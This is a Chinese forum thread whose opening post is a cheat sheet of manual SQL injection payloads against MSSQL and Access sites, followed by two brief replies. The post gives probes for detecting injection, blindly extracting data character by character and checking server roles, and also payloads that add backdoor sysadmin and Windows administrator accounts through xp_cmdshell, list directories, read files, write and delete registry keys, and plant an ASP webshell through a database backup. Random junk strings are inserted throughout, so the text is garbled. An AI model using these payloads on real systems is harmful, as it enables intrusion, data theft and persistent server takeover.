社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4932阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 FgH7YkKrD  
  2.初步判断是否是mssql ;and user>0 '0HOL)cIz  
'zI(OnIS  
  3.注入参数是字符'and [查询条件] and ''=' nQiZ6[L  
B7 s{yb  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' UGO#o`.G}  
[J,.?'V  
  5.判断数据库系统 d6J/)nl  
tJ^p}yxO  
  ;and (select count(*) from sysobjects)>0 mssql O52 /fGt  
&en. m>9,  
  ;and (select count(*) from msysobjects)>0 access sy"}25s  
|oPRP1F-;e  
^ }7O|Y7  
AQ'%}(#0  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 q/ljH_-  
?9~^QRLT  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 `==l 2AX  
{:1j>4m 2  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 v #+ECx  
yNvAT>H  
  9.(1)猜字段的ascii值(access) ~[%CUc"  
5NhFjPETr  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 83vMj$P  
Cab.a)o  
  (2)猜字段的ascii值(mssql) +bznKy!  
(tg.]q_=u  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ;5tOQ&p%v  
{'IO  
  10.测试权限结构(mssql) =%W:N|k  
 >. K  
=~;~hZj  
J0!V(  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- iHPsRq!  
Dj\nsc@e3  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- *`H*@2  
`Z;Z^c  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- k6b ct@7  
ZO<,V  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- O*~,L6# }  
m'"r<]pB*4  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 0+CcNY9  
16L YVvmW  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- EVPQe-  
1/97_:M0~F  
  ;and 1=(select IS_MEMBER('db_owner'));-- JQ%hh&M\0  
oP,*H6)i  
^C'S-2nGH  
n#">k%bD  
  11.添加mssql和系统的帐户 M/W"M9u  
8B G Z  
  ;exec master.dbo.sp_addlogin username;-- >?@5>wF  
  ;exec master.dbo.sp_password null,username,password;-- AX v q~XE  
B'yjMY![  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- nqy*>X`  
L3%frIUd  
  ;exec master.dbo.xp_cmdshell 'net user username password MqZ"Js  
YZf{."Opj[  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- $)#orZtzr  
I/(U0`%  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- cp Ot?XYR~  
NVM_.vL  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 6BV 6<PHJ  
MZt#T+b  
!{-W%=Kf  
lq9|tt6Z  
  12.(1)遍历目录 0 PYYG  
z/J?!ee  
  ;create table dirs(paths varchar(100), id int) <MS>7Fd2  
b=EI?XwJ  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' ;KQU% k$  
d ~ M;  
  ;and (select top 1 paths from dirs)>0 JQKXbsXS  
77M!2S_E  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) x:)H Ii q/  
\Eh5g/,[  
d_,Mylk  
cP?GRMX@}  
  (2)遍历目录 gCg hWg{S  
}`w(sec:3  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 8xlj,}QO\  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 lR %#R  
h ;uzbu  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 9?\cm}^?  
fK7 ?"^`/  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 WHC/'kvF  
5,;\zSz  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 v\w*VCjoV  
M]o]D;N~l  
FsqH:I4O  
b]u=I za  
  13.mssql中的存储过程 uf?;;wg  
YW7w>}aW  
  xp_regenumvalues 注册表根键, 子键 P.YT/  
\IQG%L{  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 qXtC7uNj$  
)cH\i91  
  xp_regread 根键,子键,键值名 W<q<}RSn  
- egTZW-  
  ;exec xp_regread B*G]Dr)e  
 (7X  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 qq!ZYWy2  
Sv#MlS>  
  xp_regwrite 根键,子键, 值名, 值类型, 值 q#j[0,^ $  
d>Tv?'o`q  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 UI=v| <'-  
V n_&q6Pa  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ;C-ds  
+\+j/sa  
  xp_regdeletevalue 根键,子键,值名 #eYYu2ND  
vs8[352  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 { 5r]G  
F+Kju2  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 xlZh(pf  
| K|AUI  
6c+29@  
@~gPZm  
  14.mssql的backup创建webshell pOK=o$1V8  
Vw ;iE=L  
  use model {#+K+!SvDX  
kQU4s)J  
  create table cmd(str image); =X(N+(1~  
n$ByTmKxv  
  insert into cmd(str) values (''); MNU7OX<  
nGGw(6c%>  
  backup database model to disk='c:\l.asp';  @mw1__?  
z~Zm1tZs  
~7aD#`amU  
!_Y%+Rkp0  
  15.mssql内置函数 X,@nD@  
&H+ wzx<  
  ;and (select @@version)>0 获得Windows的版本号 Kez0Bka  
oG22;  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa 4qDa: D"5  
zx)}XOYf  
  ;and (select user_name())>0 爆当前系统的连接用户 "LYhYkI  
?p6@uM\Q7  
  ;and (select db_name())>0 得到当前连接的数据库 j*2/[Eq  
*} *HXE5  
v+E J $  
 l  
  16.简洁的webshell /p;OZf]  
H1~9f {  
  use model gRs @T<k2  
3I'7+?@@l  
  create table cmd(str image); Fu?_<G%Ynp  
aIT0t0.  
  insert into cmd(str) values (''); hRKJKQ@7  
11S{XbU  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八